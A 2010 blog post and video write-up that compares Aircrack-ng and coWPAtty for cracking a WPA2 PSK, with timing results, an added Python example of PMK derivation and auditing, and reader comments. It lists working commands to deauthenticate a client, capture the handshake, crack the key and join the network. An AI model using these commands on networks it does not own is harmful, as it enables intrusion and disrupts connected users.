2010-02-13

[Analysis][Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3356785
Download video: http://www.mediafire.com/?9dkjbygu238p2uj




What is this?
A comparison of Aircrack-ng and coWPAtty on the time it takes to crack a WPA2 PSK key.
It shows four different cracks, with the time taken and the speed of each (see results):
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> coWPAtty (Dictionary)
> coWPAtty & genpmk (Pre-computed hashes)




How does this work?
To crack a WPA/WPA2 PSK you need to capture a ‘handshake’ (the 4-way handshake exchanged when a client joins the network). The quickest way to get this packet is for the attacker to disconnect a client that is currently connected, so that it re-connects (if the attacker keeps repeating this step, it becomes a DoS for that user).

Once the handshake has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, it's just a question of waiting for the dictionary file to be processed.

From there, the attacker can use that key to decrypt the data captured earlier, and so is able to ‘read’ it as well as join the network.

If there isn't a connected client, you can't do this. If the network key isn't in the dictionary file, you can't do this.

You can speed up the cracking process by creating pre-calculated hash files (see results for how much faster!)

Results
Software                    Time (s)   Keys/s      Pre-calc time (s)
Aircrack-ng                   256.2       652.94           0
Aircrack-ng + airolib-ng        2       65685.4       1162.2
coWPAtty                      787.71      205.35           0
coWPAtty + genpmk               1.25   129715.92       1228.06
Aircrack-ng & airolib-ng     1164.2     65685.4       1162.2     (total: crack + pre-calc)
coWPAtty & genpmk            1229.31   129715.92       1228.06   (total: crack + pre-calc)

The dictionary had 311141 lines (3.33M (3,499,543 bytes)).
The WPA key was on line 202762.
Therefore it had to test 65.1% of the dictionary.



Aircrack-ng is better with a dictionary attack, whereas coWPAtty & genpmk is better with pre-computed hashes (but it also takes longer to calculate them!)
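The reason pre-computed hashes pay off is that the slow part of each guess is turning a candidate passphrase into a PMK (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes), which depends only on the SSID and the word, not on the captured handshake. genpmk and airolib-ng pay that cost once per (SSID, word) up front. The Python below is an added example, not code from the post or from the aircrack-ng/coWPAtty projects: it derives the PMK exactly as wpa_passphrase does, builds a small pre-computed table, and does the defender-side check of whether your own passphrase would fall to a given wordlist. The wordlist is constructed for the example; the only real value is the IEEE 802.11i Annex H test vector (SSID "IEEE", passphrase "password").

```python
import hashlib
from typing import Dict, Iterable, Optional

# Parameters fixed by IEEE 802.11i for WPA/WPA2-Personal (PSK mode).
PBKDF2_ITERATIONS = 4096   # the cost that makes every dictionary guess slow
PMK_LEN = 32               # 256-bit Pairwise Master Key

# Real test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

# Constructed wordlist for this example (not a real dictionary file). The post's own
# key, "precivilization", is included so the audit below finds it.
SAMPLE_WORDLIST = [
    "admin",             # too short: can never be a WPA passphrase, so it is skipped
    "password",
    "letmein123",
    "precivilization",   # the key from the post's wpa_passphrase command
    "sunshine2010",
]


def is_valid_passphrase(passphrase: str) -> bool:
    """802.11i: 8 to 63 characters, each printable ASCII (32..126).
    Anything else cannot be a PSK passphrase, so such wordlist lines are skipped."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the 64-hex-digit psk that wpa_passphrase prints. The SSID is the salt,
    so a PMK (and any table of them) is only valid for that one network name."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def precompute_pmks(ssid: str, wordlist: Iterable[str]) -> Dict[bytes, str]:
    """The trade genpmk and airolib-ng make: pay the PBKDF2 cost once per (SSID, word)
    up front, so that checking a candidate against a handshake for that SSID is only
    the cheap remaining step. Returns {pmk: passphrase}; invalid lines are dropped."""
    table: Dict[bytes, str] = {}
    for line in wordlist:
        word = line.rstrip("\r\n")
        if is_valid_passphrase(word):
            table[derive_pmk(word, ssid)] = word
    return table


def audit_passphrase(ssid: str, passphrase: str, wordlist: Iterable[str]) -> Optional[int]:
    """Defender's check for your own network: would this wordlist recover my key?
    Returns the 1-based line number of the hit, or None. It compares PMKs, i.e. exactly
    the value a dictionary attack against this SSID has to compute for each line."""
    target = derive_pmk(passphrase, ssid)
    for lineno, line in enumerate(wordlist, start=1):
        word = line.rstrip("\r\n")
        if is_valid_passphrase(word) and derive_pmk(word, ssid) == target:
            return lineno
    return None


if __name__ == "__main__":
    # Sanity check against the standard's test vector.
    assert derive_pmk(IEEE_VECTOR[0], IEEE_VECTOR[1]).hex() == IEEE_VECTOR[2]

    ssid = "g0tmi1k"
    hit = audit_passphrase(ssid, "precivilization", SAMPLE_WORDLIST)
    print(f"'precivilization' found on wordlist line {hit}")

    # A pre-computed table is tied to the SSID it was built for.
    table = precompute_pmks(ssid, SAMPLE_WORDLIST)
    print(f"{len(table)} PMKs pre-computed for SSID {ssid!r}")
    print("lookup, same SSID :", table.get(derive_pmk("precivilization", ssid)))
    print("lookup, other SSID:", table.get(derive_pmk("precivilization", "linksys")))
```

Two things to take away from running it: the "other SSID" lookup misses, which is why a table built for one network name is worthless against another (and why a non-default SSID blunts shared pre-computed tables), and the audit returns a line number for "precivilization" because it is in the list, while a passphrase that is in no wordlist returns None no matter how fast the cracker is, which is the point made under "How does this work?".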


What do I need?

> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

Name: coWPAtty
Version: 4.3
Home Page: http://www.willhackforsushi.com/Cowpatty.html
Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz


Commands:
# Put the card into monitor mode and survey the networks in range
airmon-ng start wlan0
airodump-ng mon0

# Capture on the target's channel only, writing to output-01.cap
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

# Aircrack-ng (dictionary): deauth a connected client so it re-joins, then crack the captured handshake
aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt



# Aircrack-ng + airolib-ng (pre-computed hashes): fill the "crackwpa" database, then crack from it
# (the file "essid" holds the network name to pre-compute for)
airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output-01.cap



# coWPAtty (dictionary)
cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt



# coWPAtty + genpmk (pre-computed hashes)
genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash



# Join the network with the recovered key and test connectivity
wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1


Notes:
Song: First State - Off the Radar (First State's 808 Clash Mix)
Video length: 08:38
Capture length: 01:14:29


Blog Post: http://g0tmi1k.blogspot.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html



~g0tmi1k

34 comments:

  1. you are the man..
    thank you my teacher.

  2. @skull2006
    Thanks for the thanks!

  3. I am trying to do this in BackTrack 4 inside VirtualBox; where do I get the dictionary from?

  4. @Motupa
    /pentest/passwords/wordlists/darkc0de.lst

  5. I need your help :x
    How do I install aircrack?
    Can you tell me your e-mail?

  6. @Difusal

    Good guide: http://www.aircrack-ng.org/doku.php?id=install_aircrack

    wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
    tar -zxvf aircrack-ng-1.1.tar.gz
    cd aircrack-ng-1.1
    make
    make install

  7. CH 1 ][ Elapsed: 7 hours 21 mins ][ 2008-03-05 16:13 ][ fixed channel wlan0: 2

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:14:A4:6C6:66 110 8 46067 42970 5 1 48 WPA2 TKIP PSK WANADOO-DB30
    00:18:F6:5F:6D:57 99 0 3320 29 0 7 48 WPA2 W/A2BTHomeHub-C201
    00:18:4D:3F:14:3A 99 0 12480 9 0 11 54. WPA2 TKIP PSK StudyWiFi

    BSSID STATION PWR Rate Lost Packets Probes

    root@bt: #

    Please tell me what I can do to crack WPA2!?
    Big problems:
    1. Too much time - Elapsed: 7 hours 21 mins
    2. No BSSID STATION PWR Rate Lost Packets Probes
    Thanks very much

  8. @Compare
    On first glance...
    1.) Channels. You're trying to use "channel 1" (I'm guessing), but it's "fixed" at "channel 2".
    2.) Clients. There aren't any connected to any network (which is an issue when cracking WPA networks).
    3.) Which is YOUR network? You didn't say! (Guessing WANADOO-DB30 due to channel, power and data levels)
    4.) Your date is waaaaaaaay off. =P

    Now... how to crack it.
    You NEED another device that is connected to your WiFi network, otherwise you need to deauth a currently connected client.
    It shouldn't take 7 hours to turn on another device that is on YOUR network. If you can't turn on another device, please don't ask for help on how to crack your neighbours' WiFi (=.
    On a side note: you may have problems detecting clients due to your "channel" problem. A "few" things may cause this...

  9. I've got a question: if I monitor traffic from a WPA network and decrypt it with the key I got from cracking the handshake, is it possible to read? Because I understood that WPA/WPA2 use another key that is special for each client. I will be happy if you could explain that; I tried to search over the internet but everybody says something different. Thanks in advance.

  10. @omer
    Yes, you can "read" the traffic by decrypting it with the aid of the network key...

    Now there are two types of network setup:
    > You can have one key that everyone uses: "Pre-shared key" - PSK (also called "Personal mode").
    > You can also set up a "RADIUS WiFi" network, which individually authenticates each user (which is what I believe you're referring to).

    Both WEP and WPA protocols allow for these methods - it's just a question of: does the hardware support it, have I got the right software, and is it set up correctly.


    This site might help you:
    http://www.darknet.org.uk/2008/12/confused-by-wep-wpa-tkip-aes-other-wireless-security-acronyms/

  11. How can I add a big dictionary to BackTrack 4?
    I use it from my flash memory, which I installed with UNetbootin.
    So, I put the flash in the USB port & work with it.
    If I had a big dictionary>>>> how can I add it in this condition?
    & what is the best one? Where can I get it?
    2nd: I got a handshake in a WPA2-PSK crack by using aircrack-ng,
    but each time I try it, I get a different key
    which doesn't work......
    What can I do about all these problems....?
    Finally... you are really good & your video was excellent.
    ThnXxXxXx again, hope I get the answer soon.
    ThnXXXXX

  12. Notice that I tried the aircrack method by getting the handshake, each time for the same network,
    &&& each time I got a different key that doesn't work....

  13. I got the WPA handshake but I cannot crack the password even when I use a big dictionary. The process of cracking WPA2 is too long.. can you teach me the fast way plz...

  14. I tried to crack my own WPA WiFi key using combofile.txt.. it takes about 5 hours but the password is not found.. same as above.. do you have any fast way, and is it possible to crack the password offline.. meaning capture the data first then crack it later.. if so, how? :)

  15. @MAtrixboy1
    As you're using UNetbootin to load a "live copy" of BackTrack via USB, you can't save files in BackTrack.
    However, you *should* be able to use other wordlist(s) in BackTrack by copying/using them off the same USB each time.
    If you wish for BackTrack to "remember", it may be worth looking into doing a persistent install.
    See: http://www.infosecramblings.com/backtrack/backtrack-4-usbpersistent-changesnessus/

    There isn't a "best wordlist".
    The bigger it is, the higher the chance it has more unique combinations, which gives you a higher success rate.
    There are a few large wordlists online, for example:
    13GB ~ http://hashcrack.blogspot.com/2010/12/wpa-psk-wordlist-download-13gb.html
    Please note: just because it's large doesn't mean it will always work!

    You can have a WiFi network that gives out different keys to different users with the aid of an authentication server. Or they could have changed the network key.
    You might not be able to join for lots of reasons! You need to gather more information.
    However, if there is an authentication server for the different keys, there's a good chance that's your issue...

    Thanks for the thanks.



    @pp
    The only way to speed it up is by having more processing power.
    However, if the key isn't in the wordlist, it will not be cracked.
    There isn't a faster method (or if there is, it's not public!)
    "If you wanted to search all the possible keys up to 15 characters long (using all the aforementioned characters) you would have to search about 800 septillion keys. If your computer can calculate a billion keys per second it would take about 24 billion years to try them all."
    http://efreedom.com/Question/2-149888/WEP-WPA-WPA2-Wifi-Sniffing

  16. @haysnamrip
    There isn't a way to speed it up! (If there is, it's not been made public!)
    If the key isn't in the wordlist, it will not be cracked.
    HOWEVER, as it's your network, you will know what the key is, therefore you can search the wordlist to see if it's there:
    cat combofile.txt | grep "REPLACE_WITH_NETWORK_KEY"

    Yes, this already is an offline attack! Once you have the handshake, it's all done offline.

  17. hi g0tmi1k :D i am new with backtrack:D.
    teach me brother:P...

  18. I have BackTrack 4 but I know nothing on how to hack WPA/WPA2 AES, TKIP+AES, PSK.
    I own my router; wireless is AES.
    First, what should I do?

  19. Don't know if you got my message on the BackTrack forum (problem with moderator) so I ask you the same question here:
    g0tmilk please help me, I make a dictionary with crunch and type "aircrack-ng output-01.cap -w /location" and after (1 sec) it shows me the message "passphrase not in dictionary". I also tried with a lot of dictionaries that I downloaded from the web, same thing. I tried with the dictionary from the backtrack4 pentest folder and it works perfectly with them. So what is the problem, why is it not working with other dictionaries?
    I watched all your videos and learned a lot from them, thanks man

  20. dude, do you have any demos cracking WPA (TKIP) using the Beck/Tews method (message falsification)? or the more recent Japanese guys updated version (link - http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf). Be interested to actually see something practical on this... thoughts?

  21. @chie (first post)
    There is lots to BackTrack, it’s hard to cover it all!
    Set yourself some goals - figure out what you want to learn and try a few things. =)



    @chie (second post)
    This post is about just that. I’ve also done a few others on the subject too. Try and follow them.



    @Marija
    If you have a low post count, a moderator has to check your post before it can be seen on the board.
    I also haven't been able to post on BackTrack since after the break-in at Christmas.

    Well, have you tried to view the wordlist you created with crunch? What commands did you use to create it?
    Which wordlists did you download?
    How are you running BackTrack as well?

    Thanks for the thanks



    @bobmclane
    No, I haven't got any video on that style of attack (Beck and Tews).
    From my understanding, it still needs a client for the attack to work, as it does a form of "Man In The Middle" style of attack.
    However, it does look like WPA-TKIP is completely broken (as it was based on WEP?).
    Cheers for the link. I've had a read through and this did pop up:
    "The Beck-Tews attack does not work WPA implementations those do not support IEEE802.11e QoS features."

  22. Hi g0tmi1k, pls help!!!
    I am new to BackTrack. ATM I have got the BackTrack 4 R2 Release ISO but I don't know how to get a big wordlist file for WPA/WPA2? And how do I install it?

  23. @evil_dragon
    Your questions have been answered in my January rant.
    http://g0tmi1k.blogspot.com/2011/01/site-news-january-2011.html

  24. Hi g0tmi1k


    I wish you would compare Pyrit pre-computed hash speed with Aircrack-ng & airolib-ng and coWPAtty & genpmk, I really need it.
    Could you update your article and add Pyrit stats to it?
    I really want to know which one has better speed with pre-computed hashes.

  25. @Saeed Y
    Yeah, updating the post to add Pyrit to the list would be a good idea. =)
    However, my GPU isn't the most powerful (just 1x Nvidia 8800).

    I've still got new videos/scripts which I've currently got planned to do before I start updating older posts, mind you....

  26. Wonderful
    You're the man
    thank you here from Brazil

  27. Can you just tell me where I can get a dictionary?
    If it is a really stupid question, at least tell me where to start, where I can learn more.
    Thanks!

    Sorry for my English.

  28. @Produção de Áudio
    Thanks for the thanks =)

    @Amblyomma
    http://g0tmi1k.blogspot.com/2011/06/dictionaries-wordlists.html
    http://g0tmi1k.blogspot.com/2011/01/site-news-january-2011.html
    http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

  29. No handshake happened!!! What's the problem.... followed your steps :-(

  30. @khan.hotguy
    Lots of things!
    Move closer to the target, and start by manually disconnecting and re-connecting. When you get the handshake that way, then try de-authing.

  31. Love the website, this is the kind of stuff that makes the web valuable, Thank you for all the info!

  32. @almostadmin
    Thanks for the thanks =)
    Glad you like it all!

  33. Hi
    I have a problem with the tutorial. I watched the g0tmi1k blogspot tutorial called
    http://g0tmi1k.blogspot.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng.html

    I do all that well, but when I come to get the WPA handshake *the problem is that it does not get it*. Any help would be appreciated; I was looking on the net about this problem but cannot find anything.

    I use AirLive wl1700, BT5, dual boot with win7 ...

    Thanks for the help

  34. @liverpool199

    Are you in range of the client?
    What happens if you manually disconnect and re-join? Are you able to capture it that way?
    *e.g. Not using the deauth attack!*
